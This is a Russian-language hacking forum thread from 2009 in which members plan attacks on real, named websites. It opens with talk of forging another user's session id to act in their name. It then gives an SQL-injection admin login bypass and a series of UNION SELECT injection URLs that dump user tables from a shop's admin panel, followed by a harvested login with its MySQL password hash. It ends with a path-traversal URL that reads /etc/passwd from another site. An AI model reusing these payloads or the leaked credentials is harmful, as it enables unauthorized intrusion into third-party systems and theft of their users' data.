Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.01.2009, 12:40
|
|
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729
Репутация:
67
|
|
Сообщение от Qam
RekRut ты похоже понял так:что я хочу просто в юрл заменить свой сид на его и типа я стал им!Нет я хочу совсем другого подсунуть ему адрес сайта перейдя на который его браузер обратится на другой сайт где выпалнит мод его именем (именем атакуемого чела) отправит приват или откроет закрытую тему если он модер конечно!Вот для этого мне и нужно разобраться что есть эта переменая сид,а браузер он полюбому не закроет тк он им же и перейдет на подсунутый мной сайт!(значит сессия будет еще жива)!Смогу ли я подделать эту переменую сид?Чтобы быть более ясне могу выложить кусочек кода если я своими словами плохо объяснил!
возможно да, кинь кусок исходника, где генерируется sid, а то так сложно угадать
|
|
|
22.01.2009, 14:31
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
$userdata = session_pagestart($user_ip, PAGE_LOGIN);
init_userprefs($userdata);
if ($sid == '' || $sid != $userdata['session_id'])
{
message_die(GENERAL_ERROR, 'Invalid_session');
}
$session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin);
Вот куски кода могу весь выложить если нужно!!
|
|
|
|
22.01.2009, 14:36
|
|
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729
Репутация:
67
|
|
Сообщение от Qam
$userdata = session_pagestart($user_ip, PAGE_LOGIN);
init_userprefs($userdata);
if ($sid == '' || $sid != $userdata['session_id'])
{
message_die(GENERAL_ERROR, 'Invalid_session');
}
$session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin);
Вот куски кода могу весь выложить если нужно!!
по видимому тебе нужно знать IP пользователя и значение переменной $autologin для генерации сессии
|
|
|
|
22.01.2009, 16:35
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
Помогите с проблемой есть сайтик "_http://www.nb-torg.ru/"
CMS - CNStats 3.3
Нашел такие проблемки в нем:
XSS
http://www.nb-torg.ru/search/?search="><script>alert("error");</script>
и отсутствие фильтрации MySQL
http://www.nb-torg.ru/gd/-17
Что можно интересного придумать с SQL как разобрать если не сложно подскажите!
Заранее спасибо!
|
|
|
|
22.01.2009, 16:47
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Чего ты вот это морочишься... Мысли глобально... Заходи в админку:
Логин: admin' OR 1=1#
Пароль любой...
Редирект не сработает, но если пораскинуть мозгами, можно тупо потом ввести:
http://www.nb-torg.ru/admin/main.php
вуаля - ты одмин
З.Ы. Я поражен, неужели это CMS?
Последний раз редактировалось groundhog; 22.01.2009 в 16:50..
|
|
|
|
22.01.2009, 17:23
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Да, это не основная админка, но опять же - учитесь мыслить глобально... У вас уже есть доступ в админку первого уровня... Она бажная... Находим в ней инъекцию и раскручиваем:
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION _SCHEMA.TABLES+LIMIT+X,1--
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_SCHEMA,TABLE _NAME),3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+ TABLE_NAME+LIKE+'%25admin%25'+LIMIT+X,1--
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_NAME,COLUMN_ NAME),3,4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+ TABLE_NAME='cns_users'+LIMIT+X,1--
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25user%25'+ AND+TABLE_SCHEMA=DATABASE()+LIMIT+X,1--
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,ID,NAME,PASSWORD,E MAIL,ICQ),3,4,5+FROM+frb_users+LIMIT+X,1--
Последний раз редактировалось groundhog; 22.01.2009 в 17:45..
|
|
|
|
22.01.2009, 17:49
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
Остальное уже разобрал:
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,concat(login,char(58),password),3 ,4,5+FROM+db5971c.cns_users+limit+0,1--
Единственный косяк с пассом не могу понять
login: bolt
pass: *8BB679C6BFDA0D1AAFC77A05A7A01DBFF48F10A5
|
|
|
|
22.01.2009, 17:53
|
|
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729
Репутация:
67
|
|
login: bolt
pass: *8BB679C6BFDA0D1AAFC77A05A7A01DBFF48F10A5
MySQL5
|
|
|
|
22.01.2009, 17:53
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Да... Что-то интересное...
|
|
|
|
22.01.2009, 21:19
|
|
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778
Репутация:
22
|
|
http://37-77.ru/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Это как использовать???
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
